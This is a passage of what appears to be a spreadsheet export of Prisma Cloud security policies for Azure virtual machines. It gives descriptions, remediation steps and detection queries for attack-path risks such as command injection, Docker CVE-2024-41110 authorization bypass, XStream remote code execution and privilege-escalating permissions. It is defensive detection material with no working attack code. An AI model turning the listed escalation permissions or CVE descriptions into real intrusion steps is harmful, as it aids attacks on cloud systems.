3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-4863</t>
        </is>
      </c>
      <c r="Y2598" t="inlineStr"/>
      <c r="Z2598" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Azure VM associated with entities that have risky permissions') AND with : (Vuln WHERE id IN ('CVE-2023-4863'))</t>
        </is>
      </c>
      <c r="AA2598" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2598" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:02</t>
        </is>
      </c>
      <c r="AC2598" t="inlineStr"/>
      <c r="AD2598" t="b">
        <v>1</v>
      </c>
      <c r="AE2598" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2598" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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598" t="inlineStr">
        <is>
          <t>e17ced42-014f-41b7-9a01-267d7d429aa5</t>
        </is>
      </c>
      <c r="AI2598" t="inlineStr">
        <is>
          <t>0d7b4f3b-8a55-4d22-86e8-6f6f2add3811</t>
        </is>
      </c>
      <c r="AJ2598" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2598" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2599">
      <c r="A2599" t="inlineStr"/>
      <c r="B2599" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2599" s="2" t="inlineStr"/>
      <c r="D2599" t="inlineStr"/>
      <c r="E2599" t="inlineStr"/>
      <c r="F2599" t="inlineStr"/>
      <c r="G2599" t="b">
        <v>1</v>
      </c>
      <c r="H25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599" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2599" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2599" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to sensitive information detected in server response on Azure virtual machine with privilege escalation permissions</t>
        </is>
      </c>
      <c r="L2599" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,DATA_EXFILTRATION</t>
        </is>
      </c>
      <c r="M2599" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2599" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2599" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2599" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2599" t="inlineStr"/>
      <c r="R2599" t="inlineStr"/>
      <c r="S2599" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2599" t="b">
        <v>0</v>
      </c>
      <c r="U2599" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2599" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2599" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines with sensitive information detected in server responses and having permissions that could potentially lead to privilege escalation.
Sensitive information in server responses includes potential unauthorized access and exploitation. When combined with elevated virtual machine permissions and sensitive credentials in the response, attackers can escalate privileges, gain control over resources, and execute malicious actions within the environment.
This policy checks for the following risky permissions:
'Microsoft.AzureActiveDirectory/b2cDirectories/write', 'Microsoft.ManagedIdentity/userAssignedIdentities/write', 'Microsoft.ManagedIdentity/userAssignedIdentities/assign/action', 'Microsoft.KeyVault/vaults/read', 'Microsoft.KeyVault/vaults/write', 'Microsoft.KeyVault/vaults/deploy/action', 'Microsoft.KeyVault/vaults/accessPolicies/write', 'Microsoft.Authorization/roleDefinitions/write', 'Microsoft.Authorization/roleAssignments/write', 'Microsoft.Authorization/policySetDefinitions/write', 'Microsoft.Authorization/policyExemptions/write', 'Microsoft.Authorization/policyDefinitions/write', 'Microsoft.Authorization/policyAssignments/resourceManagementPrivateLinks/privateEndpointConnections/write', 'Microsoft.Authorization/policyAssignments/resourceManagementPrivateLinks/privateEndpointConnectionProxies/write', 'Microsoft.Authorization/policyAssignments/resourceManagementPrivateLinks/write', 'Microsoft.Authorization/policyAssignments/privateLinkAssociations/write', 'Microsoft.Authorization/policyAssignments/write', 'Microsoft.Authorization/locks/write', 'Microsoft.Authorization/denyAssignments/write', 'Microsoft.Authorization/classicAdministrators/write'
Immediate attention is required to review the server response, add the WAAS rule to prevent this activity, review and remove unwanted permissions assigned to the VM instance.</t>
        </is>
      </c>
      <c r="X2599" t="inlineStr">
        <is>
          <t>[WAAS]
1. Open Console, and go to 'Runtime Security' 
2. Create a WAAS rule by selecting the WAAS sub-menu item under the Defend menu.
3. Choose the relevant tab for the workload.
4. Follow the instructions to deploy the in-line rule found at https://docs.prismacloud.io/en/enterprise-edition/content-collections/runtime-security/waas/deploy-waas/hosts
5. Set the protection effect in the created WAAS rule to \"Prevent\" for the protection setting 'Detect Information Leakage'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t>
        </is>
      </c>
      <c r="Y2599" t="inlineStr"/>
      <c r="Z2599" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('azure-vm-list') AND finding.name contains all ('Azure VM associated with entities that have risky permissions','Sensitive information detected in server response')</t>
        </is>
      </c>
      <c r="AA2599" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2599" t="inlineStr">
        <is>
          <t>2024-09-02 06:33:48</t>
        </is>
      </c>
      <c r="AC2599" t="inlineStr"/>
      <c r="AD2599" t="b">
        <v>1</v>
      </c>
      <c r="AE2599" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2599" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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599" t="inlineStr">
        <is>
          <t>5fc6a0f5-b53b-4981-a58b-22a8cac78cf2</t>
        </is>
      </c>
      <c r="AI2599" t="inlineStr">
        <is>
          <t>2335fe18-a4d9-4186-a333-26e8cf438964</t>
        </is>
      </c>
      <c r="AJ2599" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2599" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2600">
      <c r="A2600" t="inlineStr"/>
      <c r="B2600" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2600" s="2" t="inlineStr"/>
      <c r="D2600" t="inlineStr"/>
      <c r="E2600" t="inlineStr"/>
      <c r="F2600" t="inlineStr"/>
      <c r="G2600" t="b">
        <v>1</v>
      </c>
      <c r="H26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00" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2600" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2600" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to Code/Command injection payload detected on traffic targetting a vulnerable Azure Virtual Machine with privilege escalation permissions</t>
        </is>
      </c>
      <c r="L2600" t="inlineStr">
        <is>
          <t>WEB_ATTACK,PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2600" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2600" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2600" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2600" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2600" t="inlineStr"/>
      <c r="R2600" t="inlineStr"/>
      <c r="S2600" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2600" t="b">
        <v>0</v>
      </c>
      <c r="U2600" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2600" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2600" t="inlineStr">
        <is>
          <t>This policy identifies vulnerable Azure Virtual Machines with Code/Command injection payload detected in the traffic and having permissions that could potentially lead to privilege escalation.
Code and command injection attacks exploit vulnerabilities in applications to inject and execute malicious code or commands. With elevated virtual machine permissions and a successful code/command injection, attackers can steal data, compromise other systems, hijack resources, disrupt services, and establish persistent access within the Azure environment.
This policy checks for the following risky permissions:
'Microsoft.AzureActiveDirectory/b2cDirectories/write','Microsoft.ManagedIdentity/userAssignedIdentities/write','Microsoft.ManagedIdentity/userAssignedIdentities/assign/action','Microsoft.KeyVault/vaults/read','Microsoft.KeyVault/vaults/write','Microsoft.KeyVault/vaults/deploy/action','Microsoft.KeyVault/vaults/accessPolicies/write','Microsoft.Authorization/roleDefinitions/write','Microsoft.Authorization/roleAssignments/write','Microsoft.Authorization/policySetDefinitions/write','Microsoft.Authorization/policyExemptions/write','Microsoft.Authorization/policyDefinitions/write','Microsoft.Authorization/policyAssignments/resourceManagementPrivateLinks/privateEndpointConnections/write','Microsoft.Authorization/policyAssignments/resourceManagementPrivateLinks/privateEndpointConnectionProxies/write','Microsoft.Authorization/policyAssignments/resourceManagementPrivateLinks/write','Microsoft.Authorization/policyAssignments/privateLinkAssociations/write','Microsoft.Authorization/policyAssignments/write','Microsoft.Authorization/locks/write','Microsoft.Authorization/denyAssignments/write','Microsoft.Authorization/classicAdministrators/write'
Immediate attention is required to review the VM traffic, add the WAAS rule to prevent this activity, remediate critical and high vulnerabilities, and remove unwanted permissions assigned to the VM instance.</t>
        </is>
      </c>
      <c r="X260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600" t="inlineStr"/>
      <c r="Z2600" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'azure-vm-list' ) and finding.name = ('Azure VM associated with entities that have risky permissions' and ('Command Injection payload detected in HTTP traffic' or 'Code Injection payload detected in HTTP traffic')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2600" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2600" t="inlineStr">
        <is>
          <t>2024-10-14 06:35:57</t>
        </is>
      </c>
      <c r="AC2600" t="inlineStr"/>
      <c r="AD2600" t="b">
        <v>1</v>
      </c>
      <c r="AE2600" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2600" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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00" t="inlineStr">
        <is>
          <t>678024e0-a8ac-4cae-8086-7079bc50b697</t>
        </is>
      </c>
      <c r="AI2600" t="inlineStr">
        <is>
          <t>eaccccb4-e640-4f08-a876-902d37445049</t>
        </is>
      </c>
      <c r="AJ2600" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2600" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2601">
      <c r="A2601" t="inlineStr"/>
      <c r="B2601" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2601" s="2" t="inlineStr"/>
      <c r="D2601" t="inlineStr"/>
      <c r="E2601" t="inlineStr"/>
      <c r="F2601" t="inlineStr"/>
      <c r="G2601" t="b">
        <v>1</v>
      </c>
      <c r="H26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01" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2601" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2601" t="inlineStr">
        <is>
          <t>Authorization bypass risk due to a publicly exposed Azure Virtual Machine with an unauthorized Docker API access vulnerability (Docker, CVE-2024-41110)</t>
        </is>
      </c>
      <c r="L2601" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2601" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2601" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2601" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2601" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2601" t="inlineStr"/>
      <c r="R2601" t="inlineStr"/>
      <c r="S2601" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2601" t="b">
        <v>0</v>
      </c>
      <c r="U2601" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2601" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2601" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have a known exploitable Authorization bypass vulnerability affecting Docker (CVE-2024-41110).
CVE-2024-41110 is a critical vulnerability in Docker that allows attackers to bypass authorization plugins (AuthZ) through specially crafted API requests, potentially leading to unauthorized actions and privilege escalation. This vulnerability affects Docker Engine versions 19.03.x and later, including Docker Desktop versions up to v4.32.0, specifically for users utilizing AuthZ plugins for access control.
Successful exploitation of CVE-2024-41110 allows attackers to bypass authorization controls, enabling them to execute unauthorized Docker commands and potentially escalate privileges. The fact that the Azure VM is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Docker (CVE-2024-41110) vulnerability and the public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2601" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict Internet exposure of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
[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2024-41110
2. Perform thorough backups of software configurations and data before applying updates
3. Refer to given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2024-41110</t>
        </is>
      </c>
      <c r="Y2601" t="inlineStr"/>
      <c r="Z2601" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-41110'))</t>
        </is>
      </c>
      <c r="AA2601" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2601" t="inlineStr">
        <is>
          <t>2024-09-27 06:57:40</t>
        </is>
      </c>
      <c r="AC2601" t="inlineStr"/>
      <c r="AD2601" t="b">
        <v>1</v>
      </c>
      <c r="AE2601" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2601" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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01" t="inlineStr">
        <is>
          <t>0116721e-9ddb-43f2-abd6-f4606acce5ce</t>
        </is>
      </c>
      <c r="AI2601" t="inlineStr">
        <is>
          <t>19403de7-0b16-476f-97c1-2e15ffcb9ab4</t>
        </is>
      </c>
      <c r="AJ2601" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2601" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2602">
      <c r="A2602" t="inlineStr"/>
      <c r="B2602" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2602" s="2" t="inlineStr"/>
      <c r="D2602" t="inlineStr"/>
      <c r="E2602" t="inlineStr"/>
      <c r="F2602" t="inlineStr"/>
      <c r="G2602" t="b">
        <v>1</v>
      </c>
      <c r="H26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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2602" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2602" t="inlineStr">
        <is>
          <t>Potentially nefarious malware activity detected on a publicly exposed and vulnerable Azure Virtual Machine</t>
        </is>
      </c>
      <c r="L2602" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING,MALWARE,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2602" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2602" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2602" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2602" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2602" t="inlineStr"/>
      <c r="R2602" t="inlineStr"/>
      <c r="S2602" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2602" t="b">
        <v>0</v>
      </c>
      <c r="U2602" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2602" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2602" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines which are publicly exposed, have critical or high vulnerabilities and are connected with remote systems known for malware activities.
Malware activity includes activity from viruses, trojans, worms, ransomware, botnet, spambot and other types of malware. Attackers can exploit vulnerabilities on the Virtual Machines to compromise the confidentiality, integrity and availability of the affected Virtual Machine and perform malicious actions. If network connectivity with remote systems known for malware activity is observed on a publicly exposed and exploitable virtual machine, it could indicate that the instance is already under attack or has been compromised.
Immediate attention is required to investigate the malware activity, remediate the critical or high vulnerabilities and restrict the public exposure reported for the Virtual Machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2602"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02" t="inlineStr"/>
      <c r="Z2602" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name = (('Azure Virtual Machine with network path from the internet (0.0.0.0/0)')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 AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2602" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2602" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC2602" t="inlineStr"/>
      <c r="AD2602" t="b">
        <v>1</v>
      </c>
      <c r="AE2602" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2602" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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2" t="inlineStr">
        <is>
          <t>a97c421d-b7f0-4a0e-8cdb-c98c78fc38d9</t>
        </is>
      </c>
      <c r="AI2602" t="inlineStr">
        <is>
          <t>6f56f896-5cff-49b2-b99b-38abedc00c0b</t>
        </is>
      </c>
      <c r="AJ2602" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2602" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2603">
      <c r="A2603" t="inlineStr"/>
      <c r="B2603" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2603" s="2" t="inlineStr"/>
      <c r="D2603" t="inlineStr"/>
      <c r="E2603" t="inlineStr"/>
      <c r="F2603" t="inlineStr"/>
      <c r="G2603" t="b">
        <v>1</v>
      </c>
      <c r="H26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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2603" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2603" t="inlineStr">
        <is>
          <t>Lateral movement and unauthorized access risk due to a publicly exposed and vulnerable Azure Virtual Machine with Key Vault management access</t>
        </is>
      </c>
      <c r="L2603" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2603" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2603" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2603" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2603" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2603" t="inlineStr"/>
      <c r="R2603" t="inlineStr"/>
      <c r="S2603" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2603" t="b">
        <v>0</v>
      </c>
      <c r="U2603" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2603" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2603" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed with critical or high vulnerabilities and have Key vault management access (data access is not included).
Publicly exposed and vulnerable Azure Virtual Machine could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Virtual Machines with Key vault management access permissions could further expand the surface of the attack and grant access to cloud resources with sensitive information.
Immediate attention is required to grant the least privileges required and remove unwanted risky permissions assigned to the VM instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2603"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03" t="inlineStr"/>
      <c r="Z2603" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Azure VM instance associated managed identities with Key Vault management access (data access is not included)') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2603" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2603" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2603" t="inlineStr"/>
      <c r="AD2603" t="b">
        <v>1</v>
      </c>
      <c r="AE2603" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2603" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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3" t="inlineStr">
        <is>
          <t>906e91dd-402e-4e22-8c24-224fcf6f49bc</t>
        </is>
      </c>
      <c r="AI2603" t="inlineStr">
        <is>
          <t>45880e23-46c0-4df2-ac17-8986e5865eaf</t>
        </is>
      </c>
      <c r="AJ2603" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2603" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2604">
      <c r="A2604" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, MLPS 2.0 (Level 2), CIS v2.0.0 (Azure) Level 1, APRA (CPS 234) Information Security, Azure Security Benchmark (v2), CIS v2.1.0 (Azure) Level 1, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, Azure Security Benchmark (v3), Copy of Azure Security Benchmark (v3), APRA (CPS 234) Information Security, CIS v1.3.0 (Azure), CIS v1.5.0 (Azure) - Level 1, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS Controls v8, NIST CSF, SOC 2, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, MTSBv2_Azure, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CIS v1.2.0 (Azure), APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], CIS v1.4.0 (Azure), CIS Controls v8.1, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), Copy of CIS v1.2.0 (Azure), Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, CIS v1.3.1 (Azure), CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2604" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2604" s="2" t="inlineStr"/>
      <c r="D2604" t="inlineStr"/>
      <c r="E2604" t="inlineStr"/>
      <c r="F2604" t="inlineStr"/>
      <c r="G2604" t="b">
        <v>0</v>
      </c>
      <c r="H26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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2604" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2604" t="inlineStr">
        <is>
          <t>Azure Virtual Machines are not utilising Managed Disks</t>
        </is>
      </c>
      <c r="L2604" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2604" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2604" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2604" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2604" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2604" t="inlineStr">
        <is>
          <t>Virtual Machines</t>
        </is>
      </c>
      <c r="R2604" t="inlineStr">
        <is>
          <t>7.1</t>
        </is>
      </c>
      <c r="S2604" t="inlineStr"/>
      <c r="T2604" t="b">
        <v>0</v>
      </c>
      <c r="U2604" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2604" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2604" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines which are not utilising Managed Disks. Using Azure Managed disk over traditional BLOB based VHD's has more advantage features like Managed disks are by default encrypted, reduces cost over storage accounts and more resilient as Microsoft will manage the disk storage and move around if underlying hardware goes faulty. It is recommended to move BLOB based VHD's to Managed Disks.</t>
        </is>
      </c>
      <c r="X2604" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Select 'Virtual Machines' from the left pane
3. Select the reported virtual machine
4. Select 'Disks' under 'Settings'
5. Click on 'Migrate to managed disks'
6. Select 'Migrate'</t>
        </is>
      </c>
      <c r="Y2604" t="inlineStr"/>
      <c r="Z2604" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-vm-list' AND json.rule = ['properties.storageProfile'].['osDisk'].['vhd'].['uri'] exists</t>
        </is>
      </c>
      <c r="AA2604" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2604" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2604" t="inlineStr">
        <is>
          <t>PC-AZR-CMP-579</t>
        </is>
      </c>
      <c r="AD2604" t="b">
        <v>1</v>
      </c>
      <c r="AE2604" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2604" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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4" t="inlineStr">
        <is>
          <t>5bb0ad91-f321-452d-9f9c-3efa2752a8be</t>
        </is>
      </c>
      <c r="AI2604" t="inlineStr">
        <is>
          <t>c1db69b3-8cb5-46b3-b42a-24d506e7d64c</t>
        </is>
      </c>
      <c r="AJ2604" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2604" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2605">
      <c r="A2605" t="inlineStr"/>
      <c r="B2605" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2605" s="2" t="inlineStr"/>
      <c r="D2605" t="inlineStr"/>
      <c r="E2605" t="inlineStr"/>
      <c r="F2605" t="inlineStr"/>
      <c r="G2605" t="b">
        <v>1</v>
      </c>
      <c r="H26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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2605" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2605" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on Azure VM with known exploitable vulnerability (CVE-2021-39144, XStream)</t>
        </is>
      </c>
      <c r="L2605" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2605" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2605" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2605" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2605" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2605" t="inlineStr"/>
      <c r="R2605" t="inlineStr"/>
      <c r="S2605" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2605" t="b">
        <v>0</v>
      </c>
      <c r="U2605" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2605" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2605" t="inlineStr">
        <is>
          <t>This policy identifies attempts to exploit a known vulnerability (CVE-2021-39144) in applications running on Azure VM resources. The presence of CVE-2021-39144 in the application indicates a critical security risk that could allow attackers to execute arbitrary code through unsafe deserialization, leading to potential system compromise.
